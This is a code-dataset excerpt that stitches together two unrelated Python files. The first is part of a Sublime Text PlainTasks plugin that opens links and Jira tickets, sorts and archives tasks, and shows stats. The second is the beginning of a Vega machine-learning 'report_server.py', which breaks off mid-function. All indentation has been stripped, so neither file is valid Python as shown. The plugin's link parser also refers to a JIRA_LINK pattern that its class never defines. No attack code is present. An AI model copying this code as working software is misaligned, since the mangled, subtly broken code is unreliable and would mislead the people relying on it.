URL_REGEX = r"""(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))
+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))"""
JIRA_REGEX = r'[^\s]+-\d+'
def run(self, edit):
s = self.view.sel()[0]
start, end = s.a, s.b
if 'url' in self.view.scope_name(start):
while self.view.substr(start) != '<': start -= 1
while self.view.substr(end) != '>': end += 1
rgn = sublime.Region(start + 1, end)
# optional select URL
self.view.sel().add(rgn)
url = self.view.substr(rgn)
if NT and all([ST3, ':' in url]):
# webbrowser uses os.startfile() under the hood, and it is not reliable in py3;
# thus call start command for url with scheme (eg skype:nick) and full path (eg c:\b)
subprocess.Popen(['start', url], shell=True)
else:
webbrowser.open_new_tab(url)
else:
if not self.search_bare_weblink_and_open(start, end):
self.search_bare_jira_and_open(start, end)
# sublime.status_message("Looks like there is nothing to open")
def search_bare_jira_and_open(self, start, end):
view_size = self.view.size()
stopSymbols = ['\t', ' ', '\"', '\'', '>', '<', ',']
# move the selection back to the start of the url
while (start > 0
and not self.view.substr(start - 1) in stopSymbols
and self.view.classify(start) & sublime.CLASS_LINE_START == 0):
start -= 1
# move end of selection forward to the end of the url
while (end < view_size
and not self.view.substr(end) in stopSymbols
and self.view.classify(end) & sublime.CLASS_LINE_END == 0):
end += 1
possible_ticket_code = self.view.substr(sublime.Region(start, end))
ticket_search = re.search(self.JIRA_REGEX, possible_ticket_code, re.X)
if ticket_search:
self._open_jira_in_browser(ticket_search.group(0))
return True
return False
def _open_jira_in_browser(self, ticket):
jira_domain = self.view.settings().get("jira_domain", None)
if not jira_domain:
return
url = "https://" + jira_domain + "/browse/" + ticket
webbrowser.open(url)
def search_bare_weblink_and_open(self, start, end):
# expand selection to nearest stopSymbols
view_size = self.view.size()
stopSymbols = ['\t', ' ', '\"', '\'', '>', '<', ',']
# move the selection back to the start of the url
while (start > 0
and not self.view.substr(start - 1) in stopSymbols
and self.view.classify(start) & sublime.CLASS_LINE_START == 0):
start -= 1
# move end of selection forward to the end of the url
while (end < view_size
and not self.view.substr(end) in stopSymbols
and self.view.classify(end) & sublime.CLASS_LINE_END == 0):
end += 1
# grab the URL
url = self.view.substr(sublime.Region(start, end))
# optional select URL
self.view.sel().add(sublime.Region(start, end))
exp = re.search(self.URL_REGEX, url, re.X)
if exp and exp.group(0):
strUrl = exp.group(0)
if strUrl.find("://") == -1:
strUrl = "http://" + strUrl
webbrowser.open_new_tab(strUrl)
return True
else:
return False
class PlainTasksOpenLinkCommand(sublime_plugin.TextCommand):
LINK_PATTERN = re.compile( # simple ./path/
r'''(?ixu)(?:^|[ \t])\.[\\/]
(?P<fn>
(?:[a-z]\:[\\/])? # special case for Windows full path
(?:[^\\/:">]+[\\/]?)+) # the very path (single filename/relative/full)
(?=[\\/:">]) # stop matching path
# options:
(>(?P<sym>\w+))?(\:(?P<line>\d+))?(\:(?P<col>\d+))?(\"(?P<text>[^\n]*)\")?
''')
MD_LINK = re.compile( # markdown [](path)
r'''(?ixu)\][ \t]*\(\<?(?:file\:///?)?
(?P<fn>.*?((\\\))?.*?)*)
(?:\>?[ \t]*
\"((\:(?P<line>\d+))?(\:(?P<col>\d+))?|(\>(?P<sym>\w+))?|(?P<text>[^\n]*))
\")?
\)
''')
WIKI_LINK = re.compile( # ORGMODE, NV, and all similar formats [[link][opt-desc]]
r'''(?ixu)\[\[(?:file(?:\+(?:sys|emacs))?\:)?(?:\.[\\/])?
(?P<fn>.*?((\\\])?.*?)*)
(?# options for orgmode link [[path::option]])
(?:\:\:(((?P<line>\d+))?(\:(?P<col>\d+))?|(\*(?P<sym>\w+))?|(?P<text>.*?((\\\])?.*?)*)))?
\](?:\[(.*?)\])?
\]
(?# options for NV [[path]] "option" — NV not support it, but PT should support so it wont break NV)
(?:[ \t]*
\"((\:(?P<linen>\d+))?(\:(?P<coln>\d+))?|(\>(?P<symn>\w+))?|(?P<textn>[^\n]*))
\")?
''')
def _format_res(self, res):
if res[3] == 'f':
return [res[0], "line: %d column: %d" % (int(res[1]), int(res[2]))]
elif res[3] == 'd':
return [res[0], 'Add folder to project' if ST3 else 'Folders are supported only in Sublime 3']
else:
return [res[0], res[1]]
def _on_panel_selection(self, selection, text=None, line=0):
if selection < 0:
self.panel_hidden = True
return
self.stop_thread = True
self.thread.join()
win = sublime.active_window()
win.run_command('hide_overlay')
res = self._current_res[selection]
if not res[3]:
return # user chose to stop search
if not ST3 and res[3] == "d":
return sublime.status_message('Folders are supported only in Sublime 3')
elif res[3] == "d":
data = win.project_data()
if not data:
data = {}
if "folders" not in data:
data["folders"] = []
data["folders"].append({'follow_symlinks': True,
'path': res[0]})
win.set_project_data(data)
else:
self.opened_file = win.open_file('%s:%s:%s' % res[:3],
sublime.ENCODED_POSITION)
if text:
sublime.set_timeout(lambda: self.find_text(self.opened_file, text, line), 300)
def search_files(self, all_folders, fn, sym, line, col, text):
'''run in separate thread; worker'''
fn = fn.replace('/', os.sep)
if os.path.isfile(fn): # check for full path
self._current_res.append((fn, line, col, "f"))
elif os.path.isdir(fn):
self._current_res.append((fn, 0, 0, "d"))
seen_folders = []
for folder in sorted(set(all_folders)):
for root, subdirs, _ in os.walk(folder):
if self.stop_thread:
return
if root in seen_folders:
continue
else:
seen_folders.append(root)
subdirs = [f for f in subdirs if os.path.join(root, f) not in seen_folders]
tname = '%s at %s' % (fn, root)
self.thread.name = tname if ST3 else tname.encode('utf8')
name = os.path.normpath(os.path.abspath(os.path.join(root, fn)))
if os.path.isfile(name):
item = (name, line, col, "f")
if item not in self._current_res:
self._current_res.append(item)
if os.path.isdir(name):
item = (name, 0, 0, "d")
if item not in self._current_res:
self._current_res.append(item)
self._current_res = self._current_res[1:] # remove 'Stop search' item
if not self._current_res:
return sublime.error_message('File was not found\n\n\t%s' % fn)
if len(self._current_res) == 1:
sublime.set_timeout(lambda: self._on_panel_selection(0), 1)
else:
entries = [self._format_res(res) for res in self._current_res]
sublime.set_timeout(lambda: self.window.show_quick_panel(entries, lambda i: self._on_panel_selection(i, text=text, line=line)), 1)
def run(self, edit):
if hasattr(self, 'thread'):
if self.thread.is_alive:
self.stop_thread = True
self.thread.join()
point = self.view.sel()[0].begin()
line = self.view.substr(self.view.line(point))
fn, sym, line, col, text = self.parse_link(line)
if not fn:
sublime.status_message('Line does not contain a valid link to file')
return
self.window = win = sublime.active_window()
self._current_res = [('Stop search', '', '', '')]
# init values to update quick panel
self.items = 0
self.panel_hidden = True
if sym:
for name, _, pos in win.lookup_symbol_in_index(sym):
if name.endswith(fn):
line, col = pos
self._current_res.append((name, line, col, "f"))
all_folders = win.folders() + [os.path.dirname(v.file_name()) for v in win.views() if v.file_name()]
self.stop_thread = False
self.thread = threading.Thread(target=self.search_files, args=(all_folders, fn, sym, line, col, text))
self.thread.setName('is starting')
self.thread.start()
self.progress_bar()
def find_text(self, view, text, line):
result = view.find(text, view.sel()[0].a if line else 0, sublime.LITERAL)
view.sel().clear()
view.sel().add(result.a)
view.set_viewport_position(view.text_to_layout(view.size()), False)
view.show_at_center(result)
def progress_bar(self, i=0, dir=1):
if not self.thread.is_alive():
PlainTasksStatsStatus.set_stats(self.view)
return
if self._current_res and sublime.active_window().active_view().id() == self.view.id():
items = len(self._current_res)
if items != self.items:
self.window.run_command('hide_overlay')
self.items = items
if self.panel_hidden:
entries = [self._format_res(res) for res in self._current_res]
self.window.show_quick_panel(entries, self._on_panel_selection)
self.panel_hidden = False
# This animates a little activity indicator in the status area
before = i % 8
after = (7) - before
if not after: dir = -1
if not before: dir = 1
i += dir
self.view.set_status('PlainTasks', u'Please wait%s…%ssearching %s' %
(' ' * before, ' ' * after, self.thread.name if ST3 else self.thread.name.decode('utf8')))
sublime.set_timeout(lambda: self.progress_bar(i, dir), 100)
return
def parse_link(self, line):
match_link = self.LINK_PATTERN.search(line)
match_md = self.MD_LINK.search(line)
match_wiki = self.WIKI_LINK.search(line)
jira_link = self.JIRA_LINK.search(line)
if match_link:
fn, sym, line, col, text = match_link.group('fn', 'sym', 'line', 'col', 'text')
elif match_md:
fn, sym, line, col, text = match_md.group('fn', 'sym', 'line', 'col', 'text')
# unescape some chars
fn = (fn.replace('\\(', '(').replace('\\)', ')'))
elif match_wiki:
fn = match_wiki.group('fn')
sym = match_wiki.group('sym') or match_wiki.group('symn')
line = match_wiki.group('line') or match_wiki.group('linen')
col = match_wiki.group('col') or match_wiki.group('coln')
text = match_wiki.group('text') or match_wiki.group('textn')
# unescape some chars
fn = (fn.replace('\\[', '[').replace('\\]', ']'))
if text:
text = (text.replace('\\[', '[').replace('\\]', ']'))
return fn, sym, line or 0, col or 0, text
class PlainTasksSortByDate(PlainTasksBase):
def runCommand(self, edit):
do_split_archived = self.view.settings().get('split_archived_by_date', False)
archive_dividor = "\n---- ✄ -----------------------"
if not re.search(r'(?su)%[Yy][-./ ]*%m[-./ ]*%d\s*%H.*%M', self.date_format):
# TODO: sort with dateutil so we wont depend on specific date_format
return
archive_pos = self.view.find(self.archive_name, 0, sublime.LITERAL)
if archive_pos:
have_date = r'(^\s*[^\n]*?\s\@(?:done|cancelled)\s*(\([\d\w,\.:\-\/ ]*\))[^\n]*$)'
all_tasks_prefixed_date = []
all_tasks = self.view.find_all(have_date, 0, u"\\2\\1", all_tasks_prefixed_date)
all_dividors = self.view.find_all(archive_dividor) if do_split_archived else []
tasks_prefixed_date = []
tasks = []
divisors = []
for ind, task in enumerate(all_tasks):
if task.a > archive_pos.b:
tasks.append(task)
tasks_prefixed_date.append(all_tasks_prefixed_date[ind])
for dividor in all_dividors:
if dividor.a > archive_pos.b:
divisors.append(dividor)
notes = []
for ind, task in enumerate(tasks):
note_line = task.end() + 1
while self.view.scope_name(note_line) == 'text.todo notes.todo ':
note = self.view.line(note_line)
notes.append(note)
tasks_prefixed_date[ind] += u'\n' + self.view.substr(note)
note_line = note.end() + 1
to_remove = tasks+notes+divisors
to_remove.sort()
for i in reversed(to_remove):
self.view.erase(edit, self.view.full_line(i))
tasks_prefixed_date.sort(reverse=self.view.settings().get('new_on_top', True))
eol = archive_pos.end()
prev_date = None
for a in tasks_prefixed_date:
if do_split_archived:
date = a.split(")")[0].split(" ")[0].replace("(", "")
if prev_date is not None and prev_date != date:
eol += self.view.insert(edit, eol, archive_dividor)
prev_date = date
eol += self.view.insert(edit, eol, u'\n' + re.sub(r'^\([\d\w,\.:\-\/ ]*\)([^\b]*$)', u'\\1', a))
else:
sublime.status_message("Nothing to sort")
class PlainTasksRemoveBold(sublime_plugin.TextCommand):
def run(self, edit):
for s in reversed(list(self.view.sel())):
a, b = s.begin(), s.end()
for r in sublime.Region(b + 2, b), sublime.Region(a - 2, a):
self.view.erase(edit, r)
class PlainTasksStatsStatus(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
self.set_stats(view)
def on_post_save(self, view):
self.on_activated(view)
@staticmethod
def set_stats(view):
view.set_status('PlainTasks', PlainTasksStatsStatus.get_stats(view))
@staticmethod
def get_stats(view):
msgf = view.settings().get('stats_format', '$n/$a done ($percent%) $progress Last task @done $last')
special_interest = re.findall(r'{{.*?}}', msgf)
for i in special_interest:
matches = view.find_all(i.strip('{}'))
pend, done, canc = [], [], []
for t in matches:
# one task may contain same tag/word several times—we count amount of tasks, not tags
t = view.line(t).a
scope = view.scope_name(t)
if 'pending' in scope and t not in pend:
pend.append(t)
elif 'completed' in scope and t not in done:
done.append(t)
elif 'cancelled' in scope and t not in canc:
canc.append(t)
msgf = msgf.replace(i, '%d/%d/%d'%(len(pend), len(done), len(canc)))
ignore_archive = view.settings().get('stats_ignore_archive', False)
if ignore_archive:
archive_pos = view.find(view.settings().get('archive_name', 'Archive:'), 0, sublime.LITERAL)
pend = len([i for i in view.find_by_selector('meta.item.todo.pending') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
done = len([i for i in view.find_by_selector('meta.item.todo.completed') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
canc = len([i for i in view.find_by_selector('meta.item.todo.cancelled') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
else:
pend = len(view.find_by_selector('meta.item.todo.pending'))
done = len(view.find_by_selector('meta.item.todo.completed'))
canc = len(view.find_by_selector('meta.item.todo.cancelled'))
allt = pend + done + canc
percent = ((done+canc)/float(allt))*100 if allt else 0
factor = int(round(percent/10)) if percent<90 else int(percent/10)
barfull = view.settings().get('bar_full', u'■')
barempty = view.settings().get('bar_empty', u'□')
progress = '%s%s' % (barfull*factor, barempty*(10-factor)) if factor else ''
tasks_dates = []
view.find_all('(^\s*[^\n]*?\s\@(?:done)\s*(\([\d\w,\.:\-\/ ]*\))[^\n]*$)', 0, "\\2", tasks_dates)
date_format = view.settings().get('date_format', '(%y-%m-%d %H:%M)')
tasks_dates = [check_parentheses(date_format, t, is_date=True) for t in tasks_dates]
tasks_dates.sort(reverse=True)
last = tasks_dates[0] if tasks_dates else '(UNKNOWN)'
msg = (msgf.replace('$o', str(pend))
.replace('$d', str(done))
.replace('$c', str(canc))
.replace('$n', str(done+canc))
.replace('$a', str(allt))
.replace('$percent', str(int(percent)))
.replace('$progress', progress)
.replace('$last', last)
)
return msg
class PlainTasksCopyStats(sublime_plugin.TextCommand):
def is_enabled(self):
return self.view.score_selector(0, "text.todo") > 0
def run(self, edit):
msg = self.view.get_status('PlainTasks')
replacements = self.view.settings().get('replace_stats_chars', [])
if replacements:
for o, r in replacements:
msg = msg.replace(o, r)
sublime.set_clipboard(msg)
class PlainTasksArchiveOrgCommand(PlainTasksBase):
def runCommand(self, edit):
# Archive the curent subtree to our archive file, not just completed tasks.
# For now, it's mapped to ctrl-shift-o or super-shift-o
# TODO: Mark any tasks found as complete, or maybe warn.
# Get our archive filename
archive_filename = self.__createArchiveFilename()
# Figure out our subtree
region = self.__findCurrentSubtree()
if region.empty():
# How can we get here?
sublime.error_message("Error:\n\nCould not find a tree to archive.")
return
# Write our region or our archive file
success = self.__writeArchive(archive_filename, region)
# only erase our region if the write was successful
if success:
self.view.erase(edit,region)
return
def __writeArchive(self, filename, region):
# Write out the given region
sublime.status_message(u'Archiving tree to {0}'.format(filename))
try:
# Have to use io.open because windows doesn't like writing
# utf8 to regular filehandles
with io.open(filename, 'a', encoding='utf8') as fh:
data = self.view.substr(region)
# Is there a way to read this in?
fh.write(u"--- ✄ -----------------------\n")
fh.write(u"Archived {0}:\n".format(tznow().strftime(
self.date_format)))
# And, finally, write our data
fh.write(u"{0}\n".format(data))
return True
except Exception as e:
sublime.error_message(u"Error:\n\nUnable to append to {0}\n{1}".format(
filename, str(e)))
return False
def __createArchiveFilename(self):
# Create our archive filename, from the mask in our settings.
# Split filename int dir, base, and extension, then apply our mask
path_base, extension = os.path.splitext(self.view.file_name())
dir = os.path.dirname(path_base)
base = os.path.basename(path_base)
sep = os.sep
# Now build our new filename
try:
# This could fail, if someone messed up the mask in the
# settings. So, if it did fail, use our default.
archive_filename = self.archive_org_filemask.format(
dir=dir, base=base, ext=extension, sep=sep)
except:
# Use our default mask
archive_filename = self.archive_org_default_filemask.format(
dir=dir, base=base, ext=extension, sep=sep)
# Display error, letting the user know
sublime.error_message(u"Error:\n\nInvalid filemask:{0}\nUsing default: {1}".format(
self.archive_org_filemask, self.archive_org_default_filemask))
return archive_filename
def __findCurrentSubtree(self):
# Return the region that starts at the cursor, or starts at
# the beginning of the selection
line = self.view.line(self.view.sel()[0].begin())
# Start finding the region at the beginning of the next line
region = self.view.indented_region(line.b + 2)
if region.contains(line.b):
# there is no subtree
return sublime.Region(-1, -1)
if not region.empty():
region = sublime.Region(line.a, region.b)
return region
class PlainTasksFoldToTags(PlainTasksFold):
TAG = r'(?u)@\w+'
def run(self, edit):
tag_sels = [s for s in list(self.view.sel()) if 'tag.todo' in self.view.scope_name(s.a)]
if not tag_sels:
sublime.status_message('Cursor(s) must be placed on tag(s)')
return
tags = self.extract_tags(tag_sels)
tasks = [self.view.line(f) for f in self.view.find_all(r'[ \t](%s)' % '|'.join(tags)) if 'pending' in self.view.scope_name(f.a)]
if not tasks:
sublime.status_message('Pending tasks with given tags are not found')
print(tags, tag_sels)
return
self.exec_folding(self.add_projects_and_notes(tasks))
def extract_tags(self, tag_sels):
tags = []
for s in tag_sels:
start = end = s.a
limit = self.view.size()
while all(self.view.substr(start) != c for c in '@ \n'):
start -= 1
if start == 0:
break
while all(self.view.substr(end) != c for c in '( @\n'):
end += 1
if end == limit:
break
match = re.match(self.TAG, self.view.substr(sublime.Region(start, end)))
tag = match.group(0) if match else False
if tag and tag not in tags:
tags.append(tag)
return tags
class PlainTasksAddGutterIconsForTags(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
view.erase_regions('critical')
view.erase_regions('high')
view.erase_regions('low')
view.erase_regions('today')
icon_critical = view.settings().get('icon_critical', '')
icon_high = view.settings().get('icon_high', '')
icon_low = view.settings().get('icon_low', '')
icon_today = view.settings().get('icon_today', '')
if not any((icon_critical, icon_high, icon_low, icon_today)):
return
critical = 'string.other.tag.todo.critical'
high = 'string.other.tag.todo.high'
low = 'string.other.tag.todo.low'
today = 'string.other.tag.todo.today'
r_critical = view.find_by_selector(critical)
r_high = view.find_by_selector(high)
r_low = view.find_by_selector(low)
r_today = view.find_by_selector(today)
if not any((r_critical, r_high, r_low, r_today)):
return
view.add_regions('critical', r_critical, critical, icon_critical, sublime.HIDDEN)
view.add_regions('high', r_high, high, icon_high, sublime.HIDDEN)
view.add_regions('low', r_low, low, icon_low, sublime.HIDDEN)
view.add_regions('today', r_today, today, icon_today, sublime.HIDDEN)
def on_post_save(self, view):
self.on_activated(view)
def on_load(self, view):
self.on_activated(view)
class PlainTasksHover(sublime_plugin.ViewEventListener):
'''Show popup with actions when hover over bullet'''
msg = ('<style>' # four curly braces because it will be modified with format method twice
'html {{{{background-color: color(var(--background) blenda(white 75%))}}}}'
'body {{{{margin: .1em .3em}}}}'
'p {{{{margin: .5em 0}}}}'
'a {{{{text-decoration: none}}}}'
'span.icon {{{{font-weight: bold; font-size: 1.3em}}}}'
'#icon-done {{{{color: var(--greenish)}}}}'
'#icon-cancel {{{{color: var(--redish)}}}}'
'#icon-archive {{{{color: var(--bluish)}}}}'
'#icon-outside {{{{color: var(--purplish)}}}}'
'#done {{{{color: var(--greenish)}}}}'
'#cancel {{{{color: var(--redish)}}}}'
'#archive {{{{color: var(--bluish)}}}}'
'#outside {{{{color: var(--purplish)}}}}'
'</style><body>'
'{actions}'
)
complete = '<a href="complete\v{point}"><span class="icon" id="icon-done">✔</span> <span id="done">Toggle complete</span></a>'
cancel = '<a href="cancel\v{point}"><span class="icon" id="icon-cancel">✘</span> <span id="cancel">Toggle cancel</span></a>'
archive = '<a href="archive\v{point}"><span class="icon" id="icon-archive">📚</span> <span id="archive">Archive</span></a>'
archivetofile = '<a href="tofile\v{point}"><span class="icon" id="icon-outside">📤</span> <span id="outside">Archive to file</span></a>'
actions = {
'text.todo meta.item.todo.pending': '<p>{complete}</p><p>{cancel}</p>'.format(complete=complete, cancel=cancel),
'text.todo meta.item.todo.completed': '<p>{archive}</p><p>{archivetofile}</p><p>{complete}</p>'.format(archive=archive, archivetofile=archivetofile, complete=complete),
'text.todo meta.item.todo.cancelled': '<p>{archive}</p><p>{archivetofile}</p><p>{complete}</p><p>{cancel}</p>'.format(archive=archive, archivetofile=archivetofile, complete=complete, cancel=cancel)
}
@classmethod
def is_applicable(cls, settings):
return settings.get('syntax') == 'Packages/PlainTasks/PlainTasks.sublime-syntax'
def on_hover(self, point, hover_zone):
self.view.hide_popup()
if hover_zone != sublime.HOVER_TEXT:
return
line = self.view.line(point)
line_scope_name = self.view.scope_name(line.a).strip()
if 'meta.item.todo' not in line_scope_name:
return
bullet = any(('bullet' in self.view.scope_name(p) for p in (point, point - 1)))
if not bullet:
return
width, height = self.view.viewport_extent()
self.view.show_popup(self.msg.format(actions=self.actions.get(line_scope_name)).format(point=point), 0, point or self.view.sel()[0].begin() or 1, width, height / 2, self.exec_action)
def exec_action(self, msg):
action, at = msg.split('\v')
case = {
'complete': lambda: self.view.run_command('plain_tasks_complete'),
'cancel': lambda: self.view.run_command('plain_tasks_cancel'),
'archive': lambda: self.view.run_command("plain_tasks_archive", {"partial": True}),
'tofile': lambda: self.view.run_command('plain_tasks_org_archive'),
}
self.view.sel().clear()
self.view.sel().add(sublime.Region(int(at)))
case[action]()
self.view.hide_popup()
class PlainTasksGotoTag(sublime_plugin.TextCommand):
def run(self, edit):
self.initial_viewport = self.view.viewport_position()
self.initial_sels = list(self.view.sel())
self.tags = sorted(
[r for r in self.view.find_by_selector('meta.tag.todo')
if not any(s in self.view.scope_name(r.a) for s in ('completed', 'cancelled'))
] +
self.view.find_by_selector('string.other.tag.todo.critical') +
self.view.find_by_selector('string.other.tag.todo.high') +
self.view.find_by_selector('string.other.tag.todo.low') +
self.view.find_by_selector('string.other.tag.todo.today')
)
window = self.view.window() or sublime.active_window()
items = [[self.view.substr(t), u'{0}: {1}'.format(self.view.rowcol(t.a)[0], self.view.substr(self.view.line(t)).strip())] for t in self.tags]
if ST3:
from bisect import bisect_left
# find the closest tag after current position of viewport, to avoid scrolling
closest_index = bisect_left([r.a for r in self.tags], self.view.layout_to_text(self.initial_viewport))
llen = len(self.tags)
selected_index = closest_index if closest_index < llen else llen - 1
window.show_quick_panel(items, self.on_done, 0, selected_index, self.on_highlighted)
else:
window.show_quick_panel(items, self.on_done)
def on_done(self, index):
if index < 0:
self.view.sel().clear()
self.view.sel().add_all(self.initial_sels)
self.view.set_viewport_position(self.initial_viewport)
return
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.tags[index].a))
self.view.show_at_center(self.tags[index])
def on_highlighted(self, index):
self.view.sel().clear()
self.view.sel().add(self.tags[index])
self.view.show(self.tags[index], True)
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import vega
from vega.common import FileOps, TaskOps
from vega.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from vega.common import MessageServer
from vega.common.utils import singleton
from vega.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
def run(self):
"""Run report server."""
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
if not records:
return None, None
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished:
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
# def _select_one_record(self, outs, choice='normal'):
# """Select one record."""
# if outs.size == 1:
# return outs.astype(int).tolist()
# if choice == 'normal':
# data = outs[:, 1:].reshape(-1, 1).tolist()
# prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(data[0]) + 1)]
# prob_temp = prob
# for idx, out in enumerate(data):
# sorted_ind = np.argsort(out)
# for idx, ind in enumerate(sorted_ind):
# prob[ind] += prob_temp[idx]
# normalization = [float(i) / float(sum(prob)) for i in prob]
# return [np.random.choice(len(data[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if vega.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif vega.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
if kwargs:
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
